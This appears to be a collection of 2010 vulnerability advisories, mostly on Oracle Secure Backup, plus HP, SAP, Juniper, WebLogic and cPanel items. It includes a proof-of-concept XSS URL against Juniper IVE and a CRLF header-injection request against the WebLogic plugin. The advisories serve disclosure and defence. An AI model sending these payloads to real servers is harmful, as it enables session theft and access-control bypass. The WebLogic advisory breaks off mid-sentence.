TPTI-10-04: Oracle Secure Backup Scheduler Service Remote Code Execution Vulnerability
TPTI-10-04: Oracle Secure Backup Scheduler Service Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-10-04 -- CVE ID: CVE-2010-0898 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Oracle -- Affected Products: Oracle Secure Backup -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8027. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Secure Backup. User interaction is not required to exploit this vulnerability. The specific flaw exists in the parsing of commands sent to the obscheduled.exe service listening by default on TCP port 1026, or 1027. Due to a lack of bounds checking on a specific command sequence the program stack can be overwritten with user controlled data. Successful exploitation can lead to remote system compromise under the SYSTEM credentials. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html -- Disclosure Timeline: 2009-03-13 - Vulnerability reported to vendor -- Credit: This vulnerability was discovered by: * Cody Pierce, TippingPoint DVLabs
ZDI-10-118: Oracle Secure Backup Administration uname Authentication Bypass Vulnerability
ZDI-10-118: Oracle Secure Backup Administration uname Authentication Bypass Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-118 July 13, 2010 -- CVSS: 9.7, (AV:N/AC:L/Au:N/C:C/I:C/A:P) -- Affected Vendors: Oracle -- Affected Products: Oracle Secure Backup -- Vulnerability Details: This vulnerability allows remote attackers to bypass authentication on vulnerable installations of Oracle Secure Backup. Authentication is not required to exploit this vulnerability. The specific flaw exists in the handling of user input to the uname variable of the login.php script running on the administration page of Oracle Secure Backup. Do to the lack of proper shell metacharacter filtering it is possible to bypass the login check. Successful exploitation of this vulnerability allows the attacker to access sensitive information running on the administration server without proper credentials. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html -- Disclosure Timeline: 2009-10-21 - Vulnerability reported to vendor 2010-07-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
Secunia Research: GIGABYTE Dldrv2 ActiveX Control Array Indexing Vulnerability
== Secunia Research 15/07/2010 - GIGABYTE Dldrv2 ActiveX Control Array Indexing Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * GIGABYTE Dldrv2 ActiveX Control 1.4.206.11 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software GIGABYTE's Download Center allows you to quickly download and update your BIOS as well as the latest system drivers.. Product Link: http://download.gigabyte.com.tw/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in GIGABYTE Dldrv2 ActiveX Control, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by missing input validation of the item argument passed to the SetDLInfo() method and can be exploited via array-indexing errors to corrupt memory. Successful exploitation allows execution of arbitrary code. == 5) Solution Set the kill-bit for the ActiveX control. == 6) Time Table 18/06/2010 - Vendor notified. 29/06/2010 - Vendor response. 15/07/2010 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-1518 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-86/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
ZDI-10-119: Oracle Secure Backup Administration $other Variable Command Injection Remote Code Execution Vulnerability
ZDI-10-119: Oracle Secure Backup Administration $other Variable Command Injection Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-119 July 13, 2010 -- CVSS: 9, (AV:N/AC:L/Au:S/C:C/I:C/A:C) -- Affected Vendors: Oracle -- Affected Products: Oracle Secure Backup -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary commands on vulnerable installations of Oracle Secure Backup. Authentication is required to exploit this vulnerability. The specific flaw exists in the handling of variables to the property_box.php script located on the Oracle Secure Backup administration server. Due to the lack of filtering on special characters it is possible to specify arbitrary commands to the command line being executed by the administration server. Successful exploitation of this can lead to remote compromise under the credentials of the web server. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html -- Disclosure Timeline: 2009-10-21 - Vulnerability reported to vendor 2010-07-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
[security bulletin] HPSBMA02439 SSRT080082 rev.3 - HP OpenView SNMP Emanate Master Agent Running on HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01757418 Version: 3 HPSBMA02439 SSRT080082 rev.3 - HP OpenView SNMP Emanate Master Agent Running on HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2009-06-15 Last Updated: 2010-07-14 Potential Security Impact: Remote unauthorized access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential vulnerability has been identified with HP OpenView SNMP Emanate Master Agent Running on HP-UX, Linux, Solaris, and Windows. The vulnerability could be exploited remotely to gain unauthorized access. References: CVE-2008-0960 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView SNMP Emanate Master Agent v15.x running on HP-UX, Solaris, Linux, and Windows BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2008-0960(AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made a patches available to resolve the vulnerability. The patches are available from http://support.openview.hp.com/selfsolve/patches Operating System Patch HP-UX (IA) PHSS_39887 or subsequent HP-UX (PA) PHSS_39886 or subsequent Linux RedHatAS2.1 LXOV_00109 or subsequent Linux RedHat4AS-x86_64 LXOV_00110 or subsequent Solaris PSOV_03522 or subsequent Windows NNM_01206 or subsequent MANUAL ACTIONS: No PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS (for HP-UX) HP-UX B.11.31 (IA) HP-UX B.11.23 (IA) = OVSNMPAgent.MASTER action: install PHSS_39887 or subsequent URL: http://support.openview.hp.com/selfsolve/patches HP-UX B.11.31 (PA) HP-UX B.11.23 (PA) HP-UX B.11.11 = OVSNMPAgent.MASTER action: install PHSS_39886 or subsequent URL: http://support.openview.hp.com/selfsolve/patches END AFFECTED VERSIONS (for HP-UX) HISTORY Version:1 (rev.1) - 15 June 2009 Initial release Version:2 (rev.2) - 22 June 2010 Patches are available Version:3 (rev.3) - 14 July 2010 Earlier HP-UX and Solaris patches resolve the vulnerability Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with
Pwnie Awards 2010
The Pwnie Awards ceremony will return for the fourth consecutive year to the BlackHat USA conference in Las Vegas. The award ceremony will take place during the BlackHat reception on Thr, July 29, 2010. The Pwnie Awards is an annual awards ceremony celebrating the achievements and failures of security researchers and the wider security community in the past year. We're currently accepting nominations in nine award categories: * Best Server-Side Bug * Best Client-Side Bug * Mass 0wnage * Most Innovative Research * Lamest Vendor Response * Most Overhyped Bug * Best Song * Most Epic FAIL * Lifetime Achievement award for hackers over 30 The deadline for nominations is Thr, July 16. To submit a nomination, visit the Pwnie Awards site at http://pwnies.com/ For more last minute information, follow @PwnieAwards on Twitter, http://twitter.com/PwnieAwards For questions, please email i...@pwnie-awards.org Alexander Sotirov Dino Dai Zovi Pwnie Awards 2010
ZDI-10-120: Oracle Secure Backup Administration objectname Command Injection Remote Code Execution Vulnerability
ZDI-10-120: Oracle Secure Backup Administration objectname Command Injection Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-120 July 13, 2010 -- CVSS: 9, (AV:N/AC:L/Au:S/C:C/I:C/A:C) -- Affected Vendors: Oracle -- Affected Products: Oracle Secure Backup -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8778. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary commands on vulnerable installations of Oracle Secure Backup. Authentication is required to exploit this vulnerability. The specific flaw exists in the handling of variables to the property_box.php script located on the Oracle Secure Backup administration server. Due to the lack of filtering on special characters it is possible to specify arbitrary commands to the command line being executed by the administration server. Successful exploitation of this can lead to remote compromise under the credentials of the web server. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html -- Disclosure Timeline: 2009-10-21 - Vulnerability reported to vendor 2010-07-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
PR09-16: Juniper Secure Access series (Juniper IVE) Cross-Site Scripting Vulnerability
PR09-16: Juniper Secure Access series (Juniper IVE) XSS Vulnerability found: 12th October 2009 Severity: Medium (Script injection) Description: There is a Cross-site Scripting vulnerability on Juniper, IVE web interface. Procheckup has found by making a malformed request to the IVE Web interface without authentication, that a vanilla cross site scripting (XSS) attack is possible. Successfully tested on: Juniper Networks IVE version 6.5R1 (Build 14599) Model SA-2000 Proof of concept: http://target-domain.foo/dana-na/auth/url_default/welcome.cgi?p=logoutc=37u=/scriptscriptalert(1)/script Consequences: An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link or visits a malicious webpage. The malicious code would run in the security context of the vulnerable website. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: passwords or session IDs) to unauthorised third parties. Fix: Ensure that the firewall's management interface is disabled on the Internet connected interface, by disabling WeBUI within service options on the Internet connected interface. Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com) Legal: Copyright 2009 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
ZDI-10-121: Command Injection Remote Code Execution Vulnerability
ZDI-10-121: Command Injection Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-121 July 13, 2010 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Oracle -- Affected Products: Oracle Secure Backup -- Vulnerability Details: This vulnerability allows remote attackers to inject arbitrary commands on vulnerable installations of Oracle Secure Backup. Authentication is required to exploit this vulnerability but may be bypassed. The specific flaw exists in the handling of the 'selector[0]' variable to the script index.php used in the administration server running on port 443. Due to improper filtering of user data a specially crafted request could lead to arbitrary commands being executed under the credentials of the service. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html -- Disclosure Timeline: 2009-10-27 - Vulnerability reported to vendor 2010-07-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * rgod -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
ZDI-10-122: Oracle Secure Backup Administration Command Injection Remote Code Execution Vulnerability
ZDI-10-122: Oracle Secure Backup Administration Command Injection Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-122 July 13, 2010 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Oracle -- Affected Products: Oracle Secure Backup -- Vulnerability Details: This vulnerability allows remote attackers to inject arbitrary commands on vulnerable installations of Oracle Secure Backup. Authentication is required to exploit this vulnerability but may be bypassed. The specific flaw exists in the handling of the 'preauth' variable to the script index.php used in the administration server running on port 443. Due to improper filtering of user data a specially crafted request could lead to arbitrary commands being executed under the credentials of the service. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html -- Disclosure Timeline: 2009-10-27 - Vulnerability reported to vendor 2010-07-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * rgod -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
ZDI-10-123: Oracle Secure Backup Administration Authentication Bypass Vulnerability
ZDI-10-123: Oracle Secure Backup Administration Authentication Bypass Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-123 July 13, 2010 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Oracle -- Affected Products: Oracle Secure Backup -- Vulnerability Details: This vulnerability allows remote attackers to bypass authentication on vulnerable installations of Oracle Secure Backup. The specific flaw exists within the register globals emulation layer which allows attackers to specify values for arbitrary program variables. When specific parameters are specified via the URI it is possible for an attacker to bypass the authentication mechanism and reach functionality otherwise inaccessible without proper credentials. This can be leveraged by remote attackers to trigger what were post-auth vulnerabilities without valid credentials. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html -- Disclosure Timeline: 2009-10-28 - Vulnerability reported to vendor 2010-07-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * rgod -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
SAPGui BI wadmxhtml.dll Tags Property Heap Corruption
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Who - SAP http://www.sap.com What - SAPGui BI component File: %PROGRAMFILES%\sap\business explorer\bi\wadmxhtml.dll Version: 7100.1.400.8 ClassID: 30DD068D-5AD9-434C-AAAC-46ABE37194EB RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data KillBitSet: False How - Vulnerable Property: Tags The Tags property can be manipulated to trigger heap corruption resulting in the execution of arbitrary code. Fix - SAP set the kill-bit for this control with Patch 17 for SAPGui. Alternatively, you can set the kill-bit manually, please see http://support.microsoft.com/kb/240797. Credit - Elazar Broad -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQECAAYFAkw/NAsACgkQi04xwClgpZiFhQP/RfjeHhaBzFZDcwpvkq8eAsE1QclV 8pqzmhDv5xXh8s+hbKYyLqLq8St/3z6reBKoHP0//BVbOSE/1CTRCyiJuKjV0SLP3qdb vkCzrtg5eoGCKUvEWoqjE6NNysmV/P0j88T/NRBv3jkznINWAl6mf+n/JwKC4KC57wKQ 9n3IjvY= =yNee -END PGP SIGNATURE-
ZDI-10-124: Oracle Secure Backup Web Interface Various Post-Auth Command Injection Remote Code Execution Vulnerabilities
ZDI-10-124: Oracle Secure Backup Web Interface Various Post-Auth Command Injection Remote Code Execution Vulnerabilities http://www.zerodayinitiative.com/advisories/ZDI-10-124 July 13, 2010 -- CVSS: 9, (AV:N/AC:L/Au:S/C:C/I:C/A:C) -- Affected Vendors: Oracle -- Affected Products: Oracle Secure Backup -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary commands on vulnerable installations of Oracle Secure Backup. Authentication is required to exploit these vulnerabilities. The specific flaws exist due to how the application passes CGI parameters to the internal obtool binary running on port 443. Due to improper filtering of user data a specially crafted request could lead to arbitrary commands being executed under the credentials of the service. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html -- Disclosure Timeline: 2009-12-10 - Vulnerability reported to vendor 2010-07-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Andrea Micalizzi aka rgod -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
CVE-2010-2375: WebLogic Plugin HTTP Injection via Encoded URLs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
VSR Security Advisory
http://www.vsecurity.com/
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: WebLogic Plugin HTTP Injection via Encoded URLs
Release Date: 2010-07-13
Application: WebLogic Plugin
Versions: All known versions
Severity: High
Discovered by: Timothy D. Morgan tmorgan (at) vsecurity {dot} com
Contributors: George D. Gal ggal {at} vsecurity (dot) com
Vendor Status: Patch Released [4]
CVE Candidate: CVE-2010-2375
Reference: http://www.vsecurity.com/resources/advisory/20100713-1/
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description
- ---
The product is best described by Oracle marketing literature in:
Oracle WebLogic Server Enterprise Edition offers enterprises the ability to
consolidate their applications on a pool of shared servers for both high
efficiency and superior performance. No other application server has
the proven performance on industry benchmarks across the most varied
chip types and operating systems. Sophisticated High Availability
(HA) features built on clustered instances ensure uptime. Easy-to-use
yet substantial management tools keep systems going without hassle or
expense. By coalescing applications and services onto Oracle WebLogic
Server, IT is in position to react swiftly to change and help the
enterprise outperform the competition. -- [1]
And:
Oracle WebLogic Server Web Server Plugins provide load balancing
across WebLogic Server Clusters by acting as front-end proxies. While
WebLogic Server Web Server Plugins 1.0 are bundled with WebLogic
Server, these new WebLogic Server Web Server Plugins 1.1 are
downloadable separately outside of WebLogic Server and deliver
enhanced functionality and improved security. -- [2]
Vulnerability Overview
- --
Over the last several years, VSR analysts had observed unusual behavior
in multiple WebLogic deployments when certain special characters were
URL encoded and appended to URLs. In late April, 2010 VSR began
researching this more in depth and found that the issue could allow for
HTTP header injection and HTTP request smuggling attacks.
Product Background
- --
WebLogic application server is commonly deployed in a three-tier
architecture where the application server resides behind a public-facing
web server. Oracle provides proprietary web server plugin modules for
multiple web server software packages on various platforms in order to
allow these services to act as reverse proxies and in some cases, load
balancers for multiple middle-tier WebLogic application servers.
Vulnerability Overview
- --
The vulnerability stems from the web server plugin's processing of URLs
submitted by users. When a URL is received, it is URL decoded at some
point, but is not re-encoded prior to inclusion in requests to the
middle-tier WebLogic server. This allows for special characters, such
as new lines, to be injected into requests directed at application
servers.
For instance, if an attacker were to send the following simple request:
GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close
The web server proxy module would instead send a request on to the
application server which looks more like:
GET /logo.gif HTTP/1.1
X-hdr: x HTTP/1.1
Host: vulnerable.example.com
Connection: close
This behavior allows for a wide variety of attacks, including trusted
header injection and HTTP request smuggling.
Attack Scenarios
-
In the simplest scenarios, an attacker could use this flaw to inject
malicious versions of headers which are considered trusted. In certain
situations, headers are added to requests by the web server proxy module
which may be used to make decisions about authentication or access
control.
For instance, the WL-Proxy-Client-IP header is added to requests to
indicate to the application server which IP address the client used. If
the application server uses this to enforce IP-based access control
restrictions, then clearly this injection vulnerability could be used to
bypass this restriction.
Another example would be the injection of a WL-Proxy-Client-Cert
header. This header is used in deployments where clients are provided
SSL/TLS client certificates for authentication. Since web servers would
typically terminate this encrypted communication, application servers
need a way of identifying the user who was authenticated. The
WL-Proxy-Client-Cert header is used to communicate this information between
the web server plugin and application servers. By injecting a false
version of this header, it would be possible to impersonate other users
and perhaps avoid presenting a client certificate at all.
More complex attacks are also possible by
cPanel XSS Vulnerability
cPanel 11.25 is vulnerable to an XSS exploit as it fails to clean user-supplied input. All versions prior to 47010 are affected. Please note that whilst this vulnerability is patched in version 47010, 47010 is currently on the bleeding-edge and isn't recommended for the stable environment. Successful exploitation can result in user credentials being taken and being used to gain escalated privileges. References: http://changelog.cpanel.net/?revision=0;tree=;treeview=;show=html;pp=50
ZDI-10-125: IBM SolidDB solid.exe Handshake Request Username Field Remote Code Execution Vulnerability
ZDI-10-125: IBM SolidDB solid.exe Handshake Request Username Field Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-125 July 13, 2010 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: IBM -- Affected Products: IBM solidDB -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9983. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM solidDB. Authentication is not required to exploit this vulnerability. The specific flaw exists within the solid.exe process which listens by default on TCP port 1315. The code responsible for parsing the first handshake packet does not properly validate the length of the username field. By crafting an overly long value in the request an attacker can exploit this to execute arbitrary code under the context of the SYSTEM user. -- Vendor Response: IBM has issued an update to correct this vulnerability. More details can be found at: http://www-01.ibm.com/support/docview.wss?uid=swg21439148amp;myns=swgimgmtamp;mynp=OCSSPK3Vamp;mync=R -- Disclosure Timeline: 2010-06-30 - Vulnerability reported to vendor 2010-07-13 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * AbdulAziz Hariri and Zein Fneish Insight Technologies -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
[ MDVSA-2010:132 ] python
